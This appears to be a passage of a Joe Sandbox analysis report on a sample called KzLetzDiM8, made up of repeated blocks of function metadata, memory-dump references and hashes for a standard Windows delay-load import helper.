                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 54d30f75159933bd2855cbb57dfad014f725ba2354f8ce5f5e290b9367c785cb
                                                            • Instruction ID: debead5ea354b3354a455c32ecec9937a27802f8154d89977bb0bb825890c725
                                                            • Opcode Fuzzy Hash: 54d30f75159933bd2855cbb57dfad014f725ba2354f8ce5f5e290b9367c785cb
                                                            • Instruction Fuzzy Hash: 1BA011EA2AC20ABC302832022C02C3B028EC0E2BA0330882EFA03C00A0AA8028800830
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 976a0206e8c1f334448fb056bdfd7ace4f5b4b7275834af01ceee48b7d8e3111
                                                            • Instruction ID: debead5ea354b3354a455c32ecec9937a27802f8154d89977bb0bb825890c725
                                                            • Opcode Fuzzy Hash: 976a0206e8c1f334448fb056bdfd7ace4f5b4b7275834af01ceee48b7d8e3111
                                                            • Instruction Fuzzy Hash: 1BA011EA2AC20ABC302832022C02C3B028EC0E2BA0330882EFA03C00A0AA8028800830
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9fb8370175629c107886d862dbc8b97f08d06c0292d1fb08920d7d84b0407414
                                                            • Instruction ID: debead5ea354b3354a455c32ecec9937a27802f8154d89977bb0bb825890c725
                                                            • Opcode Fuzzy Hash: 9fb8370175629c107886d862dbc8b97f08d06c0292d1fb08920d7d84b0407414
                                                            • Instruction Fuzzy Hash: 1BA011EA2AC20ABC302832022C02C3B028EC0E2BA0330882EFA03C00A0AA8028800830
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: fe879e919e416363867d20868abad6ecb3182931792fae641d32876384c70e78
                                                            • Instruction ID: debead5ea354b3354a455c32ecec9937a27802f8154d89977bb0bb825890c725
                                                            • Opcode Fuzzy Hash: fe879e919e416363867d20868abad6ecb3182931792fae641d32876384c70e78
                                                            • Instruction Fuzzy Hash: 1BA011EA2AC20ABC302832022C02C3B028EC0E2BA0330882EFA03C00A0AA8028800830
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 84b2f3ab35b4c89a19d49395ea6a6cc0511ab52d7ce5d815b0e5e975f4e590cd
                                                            • Instruction ID: debead5ea354b3354a455c32ecec9937a27802f8154d89977bb0bb825890c725
                                                            • Opcode Fuzzy Hash: 84b2f3ab35b4c89a19d49395ea6a6cc0511ab52d7ce5d815b0e5e975f4e590cd
                                                            • Instruction Fuzzy Hash: 1BA011EA2AC20ABC302832022C02C3B028EC0E2BA0330882EFA03C00A0AA8028800830
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 6e0bffa9aa322c1afe94e538342a4d656f60baca7440a6ec8f2a89a2f5ae2cef
                                                            • Instruction ID: debead5ea354b3354a455c32ecec9937a27802f8154d89977bb0bb825890c725
                                                            • Opcode Fuzzy Hash: 6e0bffa9aa322c1afe94e538342a4d656f60baca7440a6ec8f2a89a2f5ae2cef
                                                            • Instruction Fuzzy Hash: 1BA011EA2AC20ABC302832022C02C3B028EC0E2BA0330882EFA03C00A0AA8028800830
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 6dc9f8a42e077de19ed04e6fea4738f2532d76719e085a988d2ab335a0ceae3e
                                                            • Instruction ID: debead5ea354b3354a455c32ecec9937a27802f8154d89977bb0bb825890c725
                                                            • Opcode Fuzzy Hash: 6dc9f8a42e077de19ed04e6fea4738f2532d76719e085a988d2ab335a0ceae3e
                                                            • Instruction Fuzzy Hash: 1BA011EA2AC20ABC302832022C02C3B028EC0E2BA0330882EFA03C00A0AA8028800830
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE3FC
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: c376af374a30a2597540a9edefcb3c91168e96f7006e5238cb2fa35cf565682b
                                                            • Instruction ID: 9fd238b3e6a9fa841d9a8e2f0227409a877aacd91a4a7415635f0fa47ed7d983
                                                            • Opcode Fuzzy Hash: c376af374a30a2597540a9edefcb3c91168e96f7006e5238cb2fa35cf565682b
                                                            • Instruction Fuzzy Hash: 67A012E51A42853C300C21001C06C37028CC0D1B30331401DF511900945D4008510432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE3FC
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 6bb18df8bc8ddebabe5debbb6a1ca172711a71f54b7f46411c794e4da9591b51
                                                            • Instruction ID: 0cf29b9589d5b59fba276a880c696865d1f568cc02dfcab07063b3cb2437e910
                                                            • Opcode Fuzzy Hash: 6bb18df8bc8ddebabe5debbb6a1ca172711a71f54b7f46411c794e4da9591b51
                                                            • Instruction Fuzzy Hash: 7AA012E51A82857C300C21001C06C37028CC0D1B70331441DF50280094594008510432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE3FC
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 4f7afb27ac6ad3af59cb816032fd5aa438693c12dbbbbea3aaea0a8731603535
                                                            • Instruction ID: 0cf29b9589d5b59fba276a880c696865d1f568cc02dfcab07063b3cb2437e910
                                                            • Opcode Fuzzy Hash: 4f7afb27ac6ad3af59cb816032fd5aa438693c12dbbbbea3aaea0a8731603535
                                                            • Instruction Fuzzy Hash: 7AA012E51A82857C300C21001C06C37028CC0D1B70331441DF50280094594008510432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE3FC
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 8d9ba14546d2f57f2ad6ff2a73b5b14dafa2e68abfce7bf3c194a818fe94c5ff
                                                            • Instruction ID: 0cf29b9589d5b59fba276a880c696865d1f568cc02dfcab07063b3cb2437e910
                                                            • Opcode Fuzzy Hash: 8d9ba14546d2f57f2ad6ff2a73b5b14dafa2e68abfce7bf3c194a818fe94c5ff
                                                            • Instruction Fuzzy Hash: 7AA012E51A82857C300C21001C06C37028CC0D1B70331441DF50280094594008510432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE3FC
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a9b8387a117faab4fb567e746b13bf847a3cc6751be01b490ead1deccbc84700
                                                            • Instruction ID: 0cf29b9589d5b59fba276a880c696865d1f568cc02dfcab07063b3cb2437e910
                                                            • Opcode Fuzzy Hash: a9b8387a117faab4fb567e746b13bf847a3cc6751be01b490ead1deccbc84700
                                                            • Instruction Fuzzy Hash: 7AA012E51A82857C300C21001C06C37028CC0D1B70331441DF50280094594008510432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE3FC
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 306d6f5bb41234a735ebd4ba979bf703d115fe306a167ef7bdc8488b034db707
                                                            • Instruction ID: 0cf29b9589d5b59fba276a880c696865d1f568cc02dfcab07063b3cb2437e910
                                                            • Opcode Fuzzy Hash: 306d6f5bb41234a735ebd4ba979bf703d115fe306a167ef7bdc8488b034db707
                                                            • Instruction Fuzzy Hash: 7AA012E51A82857C300C21001C06C37028CC0D1B70331441DF50280094594008510432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE51F
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 0a26c7a4a08e9bfa6d236389205c4e25b5e062530d8d031aea977e417d75146b
                                                            • Instruction ID: 1a912d6f4df434777d9ceafe29eb9d210e94ed55227b6dc4ff9ee665bbbd4a67
                                                            • Opcode Fuzzy Hash: 0a26c7a4a08e9bfa6d236389205c4e25b5e062530d8d031aea977e417d75146b
                                                            • Instruction Fuzzy Hash: 95A012C95A91457C300831001C02C3B018CC0D2F60330441DF502800A569400C400470
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE51F
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9b916421591ce72561ca34a3f03c43821eea0f6e31c84902fd7d1c9fef5b6fba
                                                            • Instruction ID: 1a912d6f4df434777d9ceafe29eb9d210e94ed55227b6dc4ff9ee665bbbd4a67
                                                            • Opcode Fuzzy Hash: 9b916421591ce72561ca34a3f03c43821eea0f6e31c84902fd7d1c9fef5b6fba
                                                            • Instruction Fuzzy Hash: 95A012C95A91457C300831001C02C3B018CC0D2F60330441DF502800A569400C400470
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE51F
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 639b7a9fdf3e06154eb6904086ab115ede0cb1744d06dbc8b268e7fd68b48864
                                                            • Instruction ID: 1a912d6f4df434777d9ceafe29eb9d210e94ed55227b6dc4ff9ee665bbbd4a67
                                                            • Opcode Fuzzy Hash: 639b7a9fdf3e06154eb6904086ab115ede0cb1744d06dbc8b268e7fd68b48864
                                                            • Instruction Fuzzy Hash: 95A012C95A91457C300831001C02C3B018CC0D2F60330441DF502800A569400C400470
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE580
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
